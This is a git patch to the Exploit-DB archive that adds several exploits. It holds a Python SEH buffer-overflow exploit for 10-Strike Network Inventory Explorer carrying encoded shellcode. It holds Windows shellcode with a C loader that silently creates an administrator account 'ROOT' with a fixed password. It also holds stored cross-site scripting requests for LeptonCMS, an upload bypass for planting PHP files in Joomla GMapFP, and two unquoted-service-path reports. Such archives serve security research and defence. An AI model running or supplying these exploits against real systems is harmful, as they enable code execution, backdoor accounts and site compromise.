From 606ad946d315e80dbcd4bb6e87544fa54c218253 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 26 Mar 2020 05:01:48 +0000
Subject: [PATCH] DB: 2020-03-26

7 changes to exploits/shellcodes

AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)

Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
Joomla! Component GMapFP 3.30 - Arbitrary File Upload
LeptonCMS 4.5.0 - Persistent Cross-Site Scripting

Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
---
 exploits/php/webapps/48245.txt      |   2 +-
 exploits/php/webapps/48248.txt      |  24 ++++++
 exploits/php/webapps/48250.txt      |  43 ++++++++++
 exploits/windows/local/48249.txt    |  37 ++++++++
 exploits/windows/local/48251.txt    |  37 ++++++++
 exploits/windows/local/48253.py     |  69 +++++++++++++++
 files_exploits.csv                  |   7 +-
 files_shellcodes.csv                |   1 +
 shellcodes/windows_x86-64/48252.txt | 127 ++++++++++++++++++++++++++++
 9 files changed, 345 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/48248.txt
 create mode 100644 exploits/php/webapps/48250.txt
 create mode 100644 exploits/windows/local/48249.txt
 create mode 100644 exploits/windows/local/48251.txt
 create mode 100755 exploits/windows/local/48253.py
 create mode 100644 shellcodes/windows_x86-64/48252.txt

diff --git a/exploits/php/webapps/48245.txt b/exploits/php/webapps/48245.txt
index 2622b9f68..fb35347b7 100644
--- a/exploits/php/webapps/48245.txt
+++ b/exploits/php/webapps/48245.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
+# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
 # Date: 2020-02-18
 # Vendor Homepage: https://wpforms.com
 # Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
diff --git a/exploits/php/webapps/48248.txt b/exploits/php/webapps/48248.txt
new file mode 100644
index 000000000..6b8186610
--- /dev/null
+++ b/exploits/php/webapps/48248.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload
+# Google Dork: inurl:''com_gmapfp''
+# Date: 2020-03-25
+# Exploit Author: ThelastVvV
+# Vendor Homepage:https://gmapfp.org/
+# Version:* Version J3.30pro
+# Tested on: Ubuntu
+
+# PoC:
+
+http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
+
+# you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg 
+
+# Dir File Path:
+
+http://127.0.0.1/images/gmapfp/file.php 
+
+or
+
+http://127.0.0.1//images/gmapfp/file.php.png
+
+# The Joomla  Gmapfp Components 3.x is allowing  
+# remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads
\ No newline at end of file
diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt
new file mode 100644
index 000000000..01f7d3944
--- /dev/null
+++ b/exploits/php/webapps/48250.txt
@@ -0,0 +1,43 @@
+# Exploit Title: LeptonCMS 4.5.0 - Persistent Cross-Site Scripting
+# Google Dork: "lepton cms"
+# Date: 2019-03-24
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://lepton-cms.org/english/home.php
+# Software Link:
+https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
+# Version: 4.5.0
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Persistent Cross-Site Scripting
+
+# Description
+A stored cross-site-scripting security issue in the edit page feature
+Url : http://TARGET/lepton/backend/pages/modify.php
+Request Type: POST
+Vulnerable Parameter : "content"
+Payload : content=<script>alert('XSS')</script>
+
+#POC
+POST /lepton/modules/wysiwyg/save.php?leptoken=03d01fea73f9810402beez1585032684 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 79
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/lepton/backend/pages/modify.php?page_id=5&leptoken=f04ef2dc728873e9fa849z1585032680
+Cookie: cookieconsent_status=dismiss; SESSc3618c3927e551a1d6443b365aef1bc3=_guGZcGkV8IUWJx91f8pVQo8aBpxO4ipp75Un8WQN-g; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=420.420.420%257C%252F%257C.thiennv.com; nv4_ctr=MTI3XzBfMF8xLlpa; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7; lep8407sessionid=6aqrn6ccetoeqdes68e44hdlul
+Upgrade-Insecure-Requests: 1
+
+page_id=5&section_id=5&content5=<script>alert('XSS')</script>
+
+### History
+=============
+2020-03-18  Issue discovered
+2020-04-20  Vendor contacted
+2020-04-21  Vendor response and hotfix
+2020-04-23  Vendor releases fixed versions
\ No newline at end of file
diff --git a/exploits/windows/local/48249.txt b/exploits/windows/local/48249.txt
new file mode 100644
index 000000000..0b99cb7aa
--- /dev/null
+++ b/exploits/windows/local/48249.txt
@@ -0,0 +1,37 @@
+# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-24
+# Vendor Homepage:https://www.avast.com/
+# Software Link :https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
+# Tested Version: 5.5.522.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 Single Language x32 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | f
+indstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """
+Avast SecureLine
+         SecureLine                       C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe                                         
+                                                       Auto
+
+C:\>sc qc SecureLine
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SecureLine
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Avast SecureLine
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48251.txt b/exploits/windows/local/48251.txt
new file mode 100644
index 000000000..1e7db5c21
--- /dev/null
+++ b/exploits/windows/local/48251.txt
@@ -0,0 +1,37 @@
+# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Step to discover Unquoted Service Path: 
+
+C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+srvInventoryWebServer     srvInventoryWebServer     C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe             Auto
+
+# Service info:
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: srvInventoryWebServer
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : srvInventoryWebServer
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48253.py b/exploits/windows/local/48253.py
new file mode 100755
index 000000000..ba2e52d64
--- /dev/null
+++ b/exploits/windows/local/48253.py
@@ -0,0 +1,69 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open the Application
+# 4.- Go to 'Main' or 'Computers'
+# 5.- Click upon 'Add'
+# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
+# 7.- Click "OK"
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed 
+# Payload size: 448 bytes
+
+buf =  b""
+buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
+buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
+buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
+buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
+buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
+buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
+buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
+buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
+buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
+buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
+buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
+buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
+buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
+buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
+buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
+buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
+buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
+buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
+buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
+buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
+buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
+buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
+buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
+buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
+buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
+buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
+buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
+buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
+buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
+buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
+buf += b"\x31\x75\x65\x50\x41\x41"
+
+nseh = struct.pack("<I", 0x909006EB)
+seh = struct.pack("<I", 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)
+
+buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "\xff" * 200
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b5870c85d..1c5c40274 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10998,6 +10998,9 @@ id,file,description,date,author,type,platform,port
 48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
 48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
 48246,exploits/windows/local/48246.txt,"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path",2020-03-24,"Víctor García",local,windows,
+48249,exploits/windows/local/48249.txt,"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path",2020-03-25,"Roberto Piña",local,windows,
+48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
+48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42494,5 +42497,7 @@ id,file,description,date,author,type,platform,port
 48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
 48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,
 48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,
-48245,exploits/php/webapps/48245.txt,"Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting",2020-03-24,"Jinson Varghese Behanan",webapps,php,
+48245,exploits/php/webapps/48245.txt,"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting",2020-03-24,"Jinson Varghese Behanan",webapps,php,
 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,
+48248,exploits/php/webapps/48248.txt,"Joomla! Component GMapFP 3.30 - Arbitrary File Upload",2020-03-25,ThelastVvV,webapps,php,
+48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index a0c0b9007..37f30a06b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1018,3 +1018,4 @@ id,file,description,date,author,type,platform
 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
 48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
+48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/48252.txt b/shellcodes/windows_x86-64/48252.txt
new file mode 100644
index 000000000..e91e2b6a3
--- /dev/null
+++ b/shellcodes/windows_x86-64/48252.txt
@@ -0,0 +1,127 @@
+## Exploit Title: Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-03-21
+## Tested on:   Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
+## Description: Windows Shellcode that adds the user 'ROOT' with the password 'I@mR00T$' to the system. The user 'ROOT' is then added to the localgroup 'Administrators'.
+
+get_kernel32_address:
+xor eax, eax
+mov eax, [fs:eax+0x30] ; EAX = &PEB
+mov eax, [eax+0xC]     ; EAX = &LDR
+mov esi, [eax+0x1C]    ; ESI = 1st entry InitOrderList - ntdll.dll
+lodsd                  ; EAX = 2nd entry InitOrderList - kernelbase.dll
+xchg esi, eax
+lodsd                  ; EAX = 3rd entry InitOrderList - kernel32.dll
+mov eax, [eax+0x8]     ; EAX = &Kernel32.dll
+push eax
+
+get_kernel32_export_table:
+mov ebx, [eax+0x3C] ; EBX = RVA NewEXEHeader
+add ebx, eax        ; EBX = &NewEXEHeader
+mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
+add ebx, eax        ; EBX = &ExportTable
+
+get_export_name_table:
+mov edx, [ebx+0x20] ; EDX = RVA ExportNameTable
+add edx, eax        ; EDX = &ExportNameTable
+
+get_export_ordinal_table:
+mov ecx, [ebx+0x24] ; ECX = RVA ExportOrdinalTable
+add ecx, eax        ; ECX = &ExportOrdinalTable
+push ecx
+
+get_export_addr_table:
+mov edi, [ebx+0x1C] ; EDI = RVA ExportAddrTable
+add edi, eax        ; EDI = &ExportAddrTable
+push edi
+
+WinExec_String:
+push 0x456E6957 ; EniW
+
+counter_init:
+xor eax, eax    ; EAX = Counter
+
+searchLoop:
+mov edi, edx    ; EDI = &ExportNameTable
+mov esi, esp    ; ESI = "WinE"
+xor ecx, ecx
+cld                  ; Process strings left to right
+mov edi, [edi+eax*4] ; EDI = RVA NthNameString
+add edi, [esp+0xC]   ; EDI = &NthNameString
+add cx, 0x4          ; ECX = len("WinE")
+repe cmpsb           ; compare [&NthNameString] to "WinExec"
+jz found             ; If [&NthNameString] == "WinExec" end loop
+inc eax              ; Counter ++
+jmp short searchLoop ; restart loop
+
+found:
+mov ecx, [esp+0x8]     ; ECX = &ExportOrdinalTable
+mov ax,  [ecx + eax*2] ;  AX = ordinalNumber
+mov edx, [esp+0x4]     ; EDX = &ExportAddrTable
+mov ebx, [edx + eax*4] ; EBX = RVA WinExec
+add ebx, [esp+0xC]     ; EBX = &WinExec
+
+add_user:
+; Call WinExec( CmdLine, ShowState );
+; $CmdLine = 'cmd.exe /c net user ROOT I@mR00T$ /ADD && net localgroup Administrators ROOT /ADD'
+; $ShowState = SW_HIDE  
+xor ecx, ecx
+mul ecx
+mov al, 0x44    ; D : 44
+push eax
+push 0x44412f20 ; DA/  
+push 0x544f4f52 ; TOOR 
+push 0x2073726f ;  sro 
+push 0x74617274 ; tart 
+push 0x73696e69 ; sini 
+push 0x6d644120 ; mdA  
+push 0x70756f72 ; puor 
+push 0x676c6163 ; glac 
+push 0x6f6c2074 ; ol t 
+push 0x656e2026 ; en & 
+push 0x26204444 ; & DD 
+push 0x412f2024 ; A/ $ 
+push 0x54303052 ; T00R 
+push 0x6d404920 ; m@I  
+push 0x544f4f52 ; TOOR 
+push 0x20726573 ;  res 
+push 0x75207465 ; u te 
+push 0x6e20632f ; n c/ 
+push 0x20657865 ;  exe 
+push 0x2e646d63 ; .dmc 
+mov eax, esp    ; EAX = &CmdLine
+push ecx        ; $ShowState 
+push eax        ; $CmdLine
+call ebx        ; Call the WinExec Function
+
+###############################################
+
+#include <windows.h>
+#include <stdio.h>
+
+char code[] = \
+"\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c"
+"\xad\x96\xad\x8b\x40\x08\x50\x8b\x58\x3c\x01\xc3"
+"\x8b\x5b\x78\x01\xc3\x8b\x53\x20\x01\xc2\x8b\x4b"
+"\x24\x01\xc1\x51\x8b\x7b\x1c\x01\xc7\x57\x68\x57"
+"\x69\x6e\x45\x31\xc0\x89\xd7\x89\xe6\x31\xc9\xfc"
+"\x8b\x3c\x87\x03\x7c\x24\x0c\x66\x83\xc1\x04\xf3"
+"\xa6\x74\x03\x40\xeb\xe7\x8b\x4c\x24\x08\x66\x8b"
+"\x04\x41\x8b\x54\x24\x04\x8b\x1c\x82\x03\x5c\x24"
+"\x0c\x31\xc9\xf7\xe1\xb0\x44\x50\x68\x20\x2f\x41"
+"\x44\x68\x52\x4f\x4f\x54\x68\x6f\x72\x73\x20\x68"
+"\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41"
+"\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67"
+"\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
+"\x44\x20\x26\x68\x24\x20\x2f\x41\x68\x52\x30\x30"
+"\x54\x68\x20\x49\x40\x6d\x68\x52\x4f\x4f\x54\x68"
+"\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63"
+"\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e"
+"\x89\xe0\x51\x50\xff\xd3";
+
+int main(int argc, char **argv)
+{
+  int (*func)();
+  func = (int(*)()) code;
+  (int)(*func)();
+}
\ No newline at end of file